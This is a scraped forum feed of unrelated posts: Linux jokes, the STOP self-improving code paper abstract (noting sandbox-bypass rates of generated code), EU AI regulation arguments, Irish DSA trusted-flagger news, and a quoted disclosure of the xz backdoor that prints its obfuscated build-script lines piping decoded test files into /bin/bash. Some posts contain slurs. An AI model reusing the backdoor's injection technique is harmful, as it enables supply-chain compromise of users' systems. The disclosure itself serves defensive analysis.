@lain @LinuxShill idk who else to ping but I'm starting to learn these things and she'd absolutely wipe the floor with me. She even mentions bloat, at this rate I wonder if she shitposts on /g/ in between making tutorials


source for that is, which I cannot bypass the paywall on :marseyshrug:

Pure, distilled, blue-meth autism vs. Something about Chinx and Linux

4chan explains it better

!nooticers you need to nootice harder


Do you we think Zuck paid for this article to counter his awkward UFC experience?

Me and who?

Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

This is the repo for the paper: Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation

@article{zelikman2023self, title={Self-Taught Optimizer (STOP): Recursively Self-Improving Code Generation}, author={Eric Zelikman, Eliana Lorch, Lester Mackey, Adam Tauman Kalai}, journal={arXiv preprint arXiv:2310.02304}, year={2023} }

Abstract: Several recent advances in AI systems (e.g., Tree-of-Thoughts and Program-Aided Language Models) solve problems by providing a "scaffolding" program that structures multiple calls to language models to generate better outputs. A scaffolding program is written in a programming language such as Python. In this work, we use a language-model-infused scaffolding program to improve itself. We start with a seed "improver" that improves an input program according to a given utility function by querying a language model several times and returning the best solution. We then run this seed improver to improve itself. Across a small set of downstream tasks, the resulting improved improver generates programs with significantly better performance than its seed improver. Afterward, we analyze the variety of self-improvement strategies proposed by the language model, including beam search, genetic algorithms, and simulated annealing. Since the language models themselves are not altered, this is not full recursive self-improvement. Nonetheless, it demonstrates that a modern language model, GPT-4 in our proof-of-concept experiments, is capable of writing code that can call itself to improve itself. We critically consider concerns around the development of self-improving technologies and evaluate the frequency with which the generated code bypasses a sandbox.






Linked xeet

Every time you share a @GIPHY, you send your data to:

checks notes

816 partners 🤯🤯🤯


EU just ruins things because they can't build anything.

AI often isn't available because of obscure laws. chatGPT had been blocked for a month. Gemini is not available right now. A disaster.

Bureaucrats want to show that they exist.

To my knowledge they've never been "blocked". Google simply didn't release them in the EU for a while.

By delaying something introducing stupid regulations, they block it.

Personally I don't want to be drinking polluted water, eat unsanitary food, live in a place where all housing is owned by a handful of entities that engage in price-fixing, work 80 hours a week in an environment when response to mass worker suicides is to install suicide nets, have my privacy violated by private corporations (foreign or domestic) or have my insurance rates tripled by some opaque discriminatory AI, but you do you in whatever dystopian future you dream of.

You're just a low life europoor communist.

EU just wants to kill tech, because its ever changing nature means that they can't control it.

Quite the opposite, in EU there is no innovation because only big tech can comply with regulation.

EU is just hurting its own startups.

USA, India, China. They all have multibillion AI companies. EU doesn't because nobody wants to deal with unpredictable lawmakers

Edit: @dang came and mopped up, RIP _giorgio_

Edit 2: actually _giorgio_ didn't get banned :marseymindblown:


I wanna be a janny :marseyjanny2:

Too soon

Palestinian lives matter


Palestinian lives matter


@X explain your country

Palestinian lives matter


linuxbros.. how will we recover?? i think its time to admit that windows is superior


People are throwing around accusations of compromised github accounts left and right :marseyschizowall: !codecels get in here and start accusing people of being bad actors :marseyglow2:


The recently-enacted European Digital Services Act (DSA) gives the Dublin-based body substantial enforcement powers over social media and video platforms in the area of policing illegal and hateful content.

The Irish regulator has been seeking to recruit trusted flaggers on three-year terms, with specific conditions and rules against conflicts of interest attached. It says that while experience in reporting hateful and illegal content is an advantage, it's not a pre-requisite.

“Approved Trusted Flaggers will have a fast lane when reporting suspected illegal content, where online platforms will be legally obliged to give their notices priority, and to process and decide on these reports without undue delay,” the regulator says on its ‘flaggers' application form

Areas to be policed include illegal speech such as discrimination and hate speech, non-consensual behaviour, online bullying and “negative effects on civic discourse or elections”. It also includes scams, offences to minors, sexual-based abuse, incitement to self-harm and other topics.




== Compromised Release Tarball ==

One portion of the backdoor is solely in the distributed tarballs. For

easier reference, here's a link to debian's import of the tarball, but it is

also present in the tarballs for 5.6.0 and 5.6.1:

That line is not in the upstream source of build-to-host, nor is

build-to-host used by xz in git. However, it is present in the tarballs

released upstream, except for the "source code" links, which I think github

generates directly from the repository contents:

This injects an obfuscated script to be executed at the end of configure. This

script is fairly obfuscated and data from "test" .xz files in the repository.

This script is executed and, if some preconditions match, modifies

$builddir/src/liblzma/Makefile to contain

am__test = bad-3-corrupt_lzma2.xz




sed rpath $(am__test_dir) | $(am__dist_setup) >/dev/null 2>&1

which ends up as

...; sed rpath ../../../tests/files/bad-3-corrupt_lzma2.xz | tr " -_" " _-" | xz -d | /bin/bash >/dev/null 2>&1; ...

Leaving out the "| bash" that produces



eval grep ^srcdir= config.status

if test -f ../../config.status;then

eval grep ^srcdir= ../../config.status



export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +724)";(xz -dc $srcdir/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377")|xz -F raw --lzma1 -dc|/bin/sh


After de-obfuscation this leads to the attached injected.txt.

== Compromised Repository ==

The files containing the bulk of the exploit are in an obfuscated form in



committed upstream. They were initially added in

Note that the files were not even used for any "tests" in 5.6.0.

Subsequently the injected code (more about that below) caused valgrind errors

and crashes in some configurations, due the stack layout differing from what

the backdoor was expecting. These issues were attempted to be worked around

in 5.6.1:

For which the exploit code was then adjusted:

Given the activity over several weeks, the committer is either directly

involved or there was some quite severe compromise of their

system. Unfortunately the latter looks like the less likely explanation, given

they communicated on various lists about the "fixes" mentioned above.

!chuds !nonchuds CHECK YO SELF. YEAR OF THE LINUX DESKTOP 2024 :marseysal:

NYC creates AI chatbot to help people understand NY law and it immediately starts telling people to break the law

Great thread from Kathryn Tewson about how rslurred this thing is

Based AI telling employer to take worker's tips lmao

Link copied to clipboard
Action successful!
Error, please refresh the page and try again.